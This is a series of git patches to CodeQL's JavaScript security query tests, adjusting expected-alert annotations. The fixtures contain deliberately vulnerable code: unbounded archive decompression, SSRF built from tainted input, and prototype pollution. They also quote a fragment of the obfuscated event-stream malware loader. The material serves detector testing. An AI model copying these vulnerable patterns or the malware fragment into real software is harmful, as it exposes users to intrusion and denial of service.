53385682867a..c5b183cb273d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-400/ReDoS/tst.js @@ -234,7 +234,7 @@ var good33 = /(a+)*([^]*|X)$/; var bad64 = /((a+)*$|[^]+)/; // $ Alert[js/redos] -var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert - The only change compared to the above is the order of alternatives, which we don't model. +var good34 = /([^]+|(a+)*$)/; // $ SPURIOUS: Alert[js/redos] - The only change compared to the above is the order of alternatives, which we don't model. var good35 = /((;|^)a+)+$/; From cea53371f2dfceefdded5a1e0c22a6d8bdaf3cae Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:01:58 +0100 Subject: [PATCH 048/115] JS: Accept alerts for missing-x-frame-options --- javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/express-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/node-bad.js | 2 +- javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js index 33372750e587..e224100b4ade 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/connect-bad.js @@ -1,7 +1,7 @@ var connect = require('connect'); var http = require('http'); -var app = connect(); +var app = connect(); // $ Alert app.use(function (req, res){ diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js index a5b05b3a16b9..7aa58b6b4e15 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/express-bad.js @@ -1,5 +1,5 @@ var express = require('express'), - app = express(); + app = express(); // $ Alert app.get('/', function (req, res) { diff --git a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js index 12a18c1cbef5..b9e5d447e72d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/hapi-bad.js @@ -1,5 +1,5 @@ var Hapi = require('hapi'); -var server = new Hapi.Server(); +var server = new Hapi.Server(); // $ Alert server.route({ handler: function (request, reply){ diff --git a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js index 8308b19bee75..5ae9cfe130c4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/koa-bad.js @@ -1,5 +1,5 @@ var Koa = require('koa'); -var app = new Koa(); +var app = new Koa(); // $ Alert app.use(function handler(ctx){ }); diff --git a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js index 4e5fbb685497..2bc553aa7852 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/node-bad.js @@ -1,4 +1,4 @@ var http = require('http') http.createServer(function (request, response) { - }).listen(9615) + }).listen(9615) // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js index 3b88523e701a..e48a51efa7e8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/restify-bad.js @@ -1,5 +1,5 @@ var restify = require('restify'); -var server = restify.createServer(); +var server = restify.createServer(); // $ Alert server.head('/', function (request, response){ }); From 260c66b3cf268db2b9c902451b4eb3497fd6d258 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:02:18 +0100 Subject: [PATCH 049/115] JS: Mark a spurious alert in missing-x-frame-options --- .../query-tests/Security/CWE-451/express-good-array-routers.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js index efe2e732b552..53efa1cc9537 100644 --- a/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js +++ b/javascript/ql/test/query-tests/Security/CWE-451/express-good-array-routers.js @@ -1,5 +1,5 @@ var express = require('express'), - app = express(); + app = express(); // $ SPURIOUS: Alert app.get('/', [ function (req, res){ From 48760d66b23e7bf6d3183688d31d983a8f1d64f1 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:04:26 +0100 Subject: [PATCH 050/115] JS: Accept alerts for HardcodedDataInterpretedAsCode --- .../ql/test/query-tests/Security/CWE-506/event-stream-orig.js | 2 +- javascript/ql/test/query-tests/Security/CWE-506/event-stream.js | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js index 85daa2d86954..95c1cc3fee66 100644 --- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js +++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream-orig.js @@ -93,7 +93,7 @@ module.exports = function (e, n) { function e(r) { return Buffer.from(r, "hex").toString(); } - var n = r(e("2e2f746573742f64617461")), + var n = r(e("2e2f746573742f64617461")), // $ Alert o = t[e(n[3])][e(n[4])]; if (!o) return; var u = r(e(n[2]))[e(n[6])](e(n[5]), o), diff --git a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js index e885d2e1f886..d358010c3ae5 100644 --- a/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js +++ b/javascript/ql/test/query-tests/Security/CWE-506/event-stream.js @@ -6,7 +6,7 @@ function e(r) { return Buffer.from(r, "hex").toString() } -var n = r(e("2e2f746573742f64617461")), +var n = r(e("2e2f746573742f64617461")), // $ Alert o = t[e(n[3])][e(n[4])]; if (!o) return; From 3f7f74b92507e18532e677d69476702c9210ccde Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:14:51 +0100 Subject: [PATCH 051/115] JS: Accept alerts for DecompressionBomb --- .../CWE-522-DecompressionBombs/adm-zip.js | 8 ++++---- .../CWE-522-DecompressionBombs/decompress.js | 2 +- .../CWE-522-DecompressionBombs/jszip.js | 2 +- .../CWE-522-DecompressionBombs/node-tar.js | 10 +++++----- .../CWE-522-DecompressionBombs/pako.js | 4 ++-- .../CWE-522-DecompressionBombs/unbzip2.js | 2 +- .../CWE-522-DecompressionBombs/unzipper.js | 16 +++++++-------- .../CWE-522-DecompressionBombs/yauzl.js | 12 +++++------ .../CWE-522-DecompressionBombs/zlib.js | 20 +++++++++---------- 9 files changed, 38 insertions(+), 38 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js index 5370a4854acc..91abc84e80c8 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/adm-zip.js @@ -25,13 +25,13 @@ function zipBomb(tarFile) { const zipEntries = admZip.getEntries(); zipEntries.forEach(function (zipEntry) { if (zipEntry.entryName === "my_file.txt") { - console.log(zipEntry.getData().toString("utf8")); + console.log(zipEntry.getData().toString("utf8")); // $ Alert } }); // outputs the content of file named 10GB - console.log(admZip.readAsText("10GB")); + console.log(admZip.readAsText("10GB")); // $ Alert // extracts the specified file to the specified location - admZip.extractEntryTo("10GB", "/tmp/", false, true); + admZip.extractEntryTo("10GB", "/tmp/", false, true); // $ Alert // extracts everything - admZip.extractAllTo("./tmp", true); + admZip.extractAllTo("./tmp", true); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js index 360e29b2f51f..e8adba55e32d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/decompress.js @@ -8,7 +8,7 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - decompress(req.query.filePath, 'dist').then(files => { + decompress(req.query.filePath, 'dist').then(files => { // $ Alert console.log('done!'); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js index 2da0757c2767..872f84e62f85 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/jszip.js @@ -30,7 +30,7 @@ function zipBombSafe(zipFile) { } function zipBomb(zipFile) { - jszipp.loadAsync(zipFile.data).then(function (zip) { + jszipp.loadAsync(zipFile.data).then(function (zip) { // $ Alert zip.files["10GB"].async("uint8array").then(function (u8) { console.log(u8); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js index 53dd6c3d0a80..499d5fd7a2bb 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/node-tar.js @@ -21,7 +21,7 @@ function zipBomb(tarFile) { const inputFile = Readable.from(tarFile.data); const outputFile = fs.createWriteStream('/tmp/untar'); inputFile.pipe( - tar.x() + tar.x() // $ Alert ).pipe(outputFile); // scenario 2 @@ -30,7 +30,7 @@ function zipBomb(tarFile) { tar.x({ strip: 1, C: 'some-dir' - }) + }) // $ Alert ) // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 fs.createReadStream(tarFile.name).pipe( @@ -47,7 +47,7 @@ function zipBomb(tarFile) { ).pipe( tar.x({ cwd: "dest" - }) + }) // $ Alert ) // scenario 4 @@ -55,8 +55,8 @@ function zipBomb(tarFile) { // or using fs.writeFile // file path is a tmp file name that can get from DB after saving to DB with remote file upload // so the input file name will come from a DB source - tar.x({ file: tarFile.name }) - tar.extract({ file: tarFile.name }) + tar.x({ file: tarFile.name }) // $ Alert + tar.extract({ file: tarFile.name }) // $ Alert // safe https://github.com/isaacs/node-tar/blob/8c5af15e43a769fd24aa7f1c84d93e54824d19d2/lib/list.js#L90 tar.x({ file: tarFile.name, diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js index 132d08e1f90a..4fb5b7d35e07 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/pako.js @@ -18,7 +18,7 @@ function zipBomb1(zipFile) { const myArray = Buffer.from(new Uint8Array(zipFile.data.buffer)); let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); @@ -29,7 +29,7 @@ function zipBomb2(zipFile) { const myArray = new Uint8Array(zipFile.data.buffer).buffer; let output; try { - output = pako.inflate(myArray); + output = pako.inflate(myArray); // $ Alert console.log(output); } catch (err) { console.log(err); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js index da560ca30f1d..83c1706573a4 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unbzip2.js @@ -9,5 +9,5 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); + fs.createReadStream(req.query.FilePath).pipe(bz2()).pipe(process.stdout); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js index 79e03b9c1814..b20bcb31de46 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/unzipper.js @@ -13,15 +13,15 @@ app.post('/upload', async (req, res) => { const RemoteStream = Readable.from(req.files.ZipFile.data); // Unsafe - RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); + RemoteStream.pipe(unzipper.Extract({ path: 'output/path' })); // $ Alert // Unsafe - RemoteStream.pipe(unzipper.ParseOne()) + RemoteStream.pipe(unzipper.ParseOne()) // $ Alert .pipe(createWriteStream('firstFile.txt')); // Safe because of uncompressedSize RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -31,14 +31,14 @@ app.post('/upload', async (req, res) => { // Unsafe RemoteStream - .pipe(unzipper.Parse()) + .pipe(unzipper.Parse()) // $ Alert .on('entry', function (entry) { const size = entry.vars.uncompressedSize; entry.pipe(createWriteStream('output/path')); }); // Unsafe - const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip) { const fileName = entry.path; if (fileName === "this IS the file I'm looking for") { @@ -48,7 +48,7 @@ app.post('/upload', async (req, res) => { } } // Safe - const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); + const zip2 = RemoteStream.pipe(unzipper.Parse({ forceStream: true })); // $ Alert for await (const entry of zip2) { const size = entry.vars.uncompressedSize; if (size < 1024 * 1024 * 1024) { @@ -57,7 +57,7 @@ app.post('/upload', async (req, res) => { } // Safe because of uncompressedSize - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { @@ -70,7 +70,7 @@ app.post('/upload', async (req, res) => { })); // Unsafe - RemoteStream.pipe(unzipper.Parse()) + RemoteStream.pipe(unzipper.Parse()) // $ Alert .pipe(stream.Transform({ objectMode: true, transform: function (entry, e, cb) { diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js index 3b726650f76f..59f22e70cebd 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/yauzl.js @@ -9,9 +9,9 @@ app.listen(3000, () => { }); app.post('/upload', (req, res) => { - yauzl.fromFd(req.files.zipFile.data) - yauzl.fromBuffer(req.files.zipFile.data) - yauzl.fromRandomAccessReader(req.files.zipFile.data) + yauzl.fromFd(req.files.zipFile.data) // $ Alert + yauzl.fromBuffer(req.files.zipFile.data) // $ Alert + yauzl.fromRandomAccessReader(req.files.zipFile.data) // $ Alert // Safe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; @@ -36,11 +36,11 @@ app.post('/upload', (req, res) => { // Unsafe yauzl.open(req.query.filePath, { lazyEntries: true }, function (err, zipfile) { if (err) throw err; - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert zipfile.on("entry", function (entry) { - zipfile.openReadStream(entry, async function (err, readStream) { + zipfile.openReadStream(entry, async function (err, readStream) { // $ Alert readStream.on("end", function () { - zipfile.readEntry(); + zipfile.readEntry(); // $ Alert }); const outputFile = fs.createWriteStream('testiness'); await pipeline( diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js index 3954d9916144..8391e16e7fed 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/zlib.js @@ -26,16 +26,16 @@ app.post('/upload', async (req, res) => { function zlibBombAsync(zipFile) { zlib.gunzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.unzip( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); zlib.brotliDecompress( - zipFile.data, + zipFile.data, // $ Alert (err, buffer) => { }); } @@ -60,9 +60,9 @@ function zlibBombAsyncSafe(zipFile) { } function zlibBombSync(zipFile) { - zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); - zlib.unzipSync(zipFile.data); - zlib.brotliDecompressSync(zipFile.data); + zlib.gunzipSync(zipFile.data, { finishFlush: zlib.constants.Z_SYNC_FLUSH }); // $ Alert + zlib.unzipSync(zipFile.data); // $ Alert + zlib.brotliDecompressSync(zipFile.data); // $ Alert } function zlibBombSyncSafe(zipFile) { @@ -74,9 +74,9 @@ function zlibBombSyncSafe(zipFile) { function zlibBombPipeStream(zipFile) { const inputStream = Readable.from(zipFile.data); const outputFile = fs.createWriteStream('unzip.txt'); - inputStream.pipe(zlib.createGunzip()).pipe(outputFile); - inputStream.pipe(zlib.createUnzip()).pipe(outputFile); - inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); + inputStream.pipe(zlib.createGunzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createUnzip()).pipe(outputFile); // $ Alert + inputStream.pipe(zlib.createBrotliDecompress()).pipe(outputFile); // $ Alert } async function zlibBombPipeStreamPromises(zipFile) { @@ -84,7 +84,7 @@ async function zlibBombPipeStreamPromises(zipFile) { const outputFile = fs.createWriteStream('unzip.txt'); await stream.pipeline( inputStream, - zlib.createGunzip(), + zlib.createGunzip(), // $ Alert outputFile ) } From cd788bc5099506a24c8a0029bb90fbd82ebd1570 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:18:57 +0100 Subject: [PATCH 052/115] JS: Mark what seems to be missing alerts for fflate The query doesn't seem to model or even mention fflate. Not sure if the library is safe or just not modeled. --- .../CWE-522-DecompressionBombs/fflate.js | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js index 48403ebc86dd..4fb6cbd6195c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js +++ b/javascript/ql/test/query-tests/Security/CWE-522-DecompressionBombs/fflate.js @@ -9,14 +9,15 @@ app.listen(3000, () => { }); app.post('/upload', async (req, res) => { - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ Alert - fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); - fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); - fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); - fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); - fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); + // Not sure if these are vulnerable, but currently not modeled + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzip(new Uint8Array(new Uint8Array(req.files.CompressedFile.data))); // $ MISSING: Alert + fflate.unzlib(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzip(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.gunzipSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompress(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert + fflate.decompressSync(new Uint8Array(req.files.CompressedFile.data)); // $ MISSING: Alert fflate.unzlibSync(new Uint8Array(req.files.CompressedFile.data), { From 0f23c33d3c0fdbcfb5b30528244248fe102ab1c8 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:20:20 +0100 Subject: [PATCH 053/115] JS: Fix a comment Apparently this comment used to say 'NOT OK' but clearly 'OK' was meant --- javascript/ql/test/query-tests/Security/CWE-598/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-598/tst.js b/javascript/ql/test/query-tests/Security/CWE-598/tst.js index 93c8146ffc42..02d4a0f0dacc 100644 --- a/javascript/ql/test/query-tests/Security/CWE-598/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-598/tst.js @@ -22,7 +22,7 @@ app.post("/login", (req, res) => { }); app.get("/login2", (req, res) => { - const username = req.param('username'); // $ Alert - usernames are fine + const username = req.param('username'); // OK - usernames are fine const password = req.param('password'); // $ Alert - password read checkUser(username, password, (result) => { res.send(result); From 1ee93cf51bd319b40dbc69124c54b06a789c6018 Mon Sep 17 00:00:00 2001 From: Asger F Date: Fri, 21 Feb 2025 20:21:17 +0100 Subject: [PATCH 054/115] JS: Manually fix two comments in JSX --- .../Security/CWE-601/ClientSideUrlRedirect/react.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js index 38828b109f13..e5da7ce96a43 100644 --- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js +++ b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/react.js @@ -7,7 +7,7 @@ class Application extends React.Component {
My unsafe app - - + \ No newline at end of file From 3a535dbf68de802ad03ea1be8341ff47ffbc5ac2 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:23:51 +0100 Subject: [PATCH 070/115] JS: Accept another alert --- .../ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html index 6b9fbfe65c8a..97ed8b016f00 100644 --- a/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html +++ b/javascript/ql/test/query-tests/Security/CWE-830/polyfill-nocheck.html @@ -1,7 +1,7 @@ Polyfill.io demo - + ... From 9f8744680db792bd66f870e8fcba74b3d112937e Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:33:02 +0100 Subject: [PATCH 071/115] JS: Remove a fixed spurious alert --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index d859f2ade6e2..ca2a1ce0fe30 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -33,7 +33,7 @@ express().get('/some/path', function (req, res) { foo.indexOf(); } if (foo instanceof Array) { - foo.indexOf(); // $ SPURIOUS: Alert + foo.indexOf(); } (foo + f()).indexOf(); From 2d1aa3e00acab29d4d2c60ec7232719604d851bf Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:35:22 +0100 Subject: [PATCH 072/115] JS: Accept missing alert and clarify reason --- javascript/ql/test/query-tests/Security/CWE-843/tst.js | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-843/tst.js b/javascript/ql/test/query-tests/Security/CWE-843/tst.js index ca2a1ce0fe30..ac055cb82ddf 100644 --- a/javascript/ql/test/query-tests/Security/CWE-843/tst.js +++ b/javascript/ql/test/query-tests/Security/CWE-843/tst.js @@ -27,6 +27,8 @@ express().get('/some/path', function (req, res) { foo.indexOf(prefix) == 1; // $ Alert foo.slice(1) === 'x'; // $ Alert + foo.length; // $ Alert + if (typeof foo === "string") { foo.indexOf(); } else { @@ -38,7 +40,7 @@ express().get('/some/path', function (req, res) { (foo + f()).indexOf(); - foo.length; // $ Alert + foo.length; // $ MISSING: Alert - missed due to guards sanitising both branches }); new Koa().use(function handler(ctx) { From 49274d5f73baf60372bc3127f38bcff7a19f601d Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:43:23 +0100 Subject: [PATCH 073/115] JS: Accept an alert --- .../examples/PrototypePollutingFunction.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js index 1953ba57f00b..052fd2e75847 100644 --- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js +++ b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingFunction/examples/PrototypePollutingFunction.js @@ -4,7 +4,7 @@ function merge(dst, src) { if (isObject(dst[key])) { merge(dst[key], src[key]); } else { - dst[key] = src[key]; + dst[key] = src[key]; // $ Alert } } } From 976096540fe6062c7abf4780953e325c52a463aa Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:08 +0100 Subject: [PATCH 074/115] JS: Accept an alert --- javascript/ql/test/query-tests/Security/CWE-918/clientSide.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js index a8d7d429cf86..1724d06091fa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/clientSide.js @@ -11,7 +11,7 @@ export function MyComponent() { const query = window.location.search.substring(1); request('https://example.com/api/' + query + '/id'); // $ Alert[js/client-side-request-forgery] request('https://example.com/api?q=' + query); - request('https://example.com/api/' + window.location.search); // likely OK - but currently flagged anyway + request('https://example.com/api/' + window.location.search); // $ Alert[js/client-side-request-forgery] - likely OK - but currently flagged anyway const fragment = window.location.hash.substring(1); request('https://example.com/api/' + fragment + '/id'); // $ Alert[js/client-side-request-forgery] From 764eb9880985e76e60a3c030340b29f4bb406bb4 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:27 +0100 Subject: [PATCH 075/115] JS: Move two alerts and add query ID --- .../ql/test/query-tests/Security/CWE-918/serverSide.js | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 50a7fe976998..777f7eb00840 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -20,8 +20,8 @@ var server = http.createServer(function(req, res) { request.get(tainted); // $ Alert[js/request-forgery] var options = {}; - options.url = tainted; // $ Alert - request(options); + options.url = tainted; + request(options); // $ Alert[js/request-forgery] request("http://" + tainted); // $ Alert[js/request-forgery] @@ -124,8 +124,8 @@ var server2 = http.createServer(function(req, res) { axios({ method: 'get', - url: tainted // $ Alert - }) + url: tainted + }) // $ Alert[js/request-forgery] var myUrl = `${something}/bla/${tainted}`; axios.get(myUrl); // $ Alert[js/request-forgery] From 4d7cbe6f607e69445a2d2a4911cba20f13389374 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:52:45 +0100 Subject: [PATCH 076/115] JS: Accept to web socket-based SSRF alerts --- javascript/ql/test/query-tests/Security/CWE-918/serverSide.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js index 777f7eb00840..a6a863860c79 100644 --- a/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js +++ b/javascript/ql/test/query-tests/Security/CWE-918/serverSide.js @@ -106,7 +106,7 @@ import * as ws from 'ws'; new ws.Server({ port: 8080 }).on('connection', function(socket, request) { socket.on('message', function(message) { const url = request.url; - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); @@ -114,7 +114,7 @@ new ws.Server({ port: 8080 }).on('connection', function (socket, request) { socket.on('message', function (message) { const url = new URL(request.url, base); const target = new URL(url.pathname, base); - const socket = new ws(url); + const socket = new ws(url); // $ Alert[js/request-forgery] }); }); From e634b31c2780ee2baa16a28a46e64c4b97bc3379 Mon Sep 17 00:00:00 2001 From: Asger F Date: Tue, 25 Feb 2025 16:58:30 +0100 Subject: [PATCH 077/115] JS: Accept some UselessConditional alerts --- .../UselessConditional/UselessConditional.js | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git 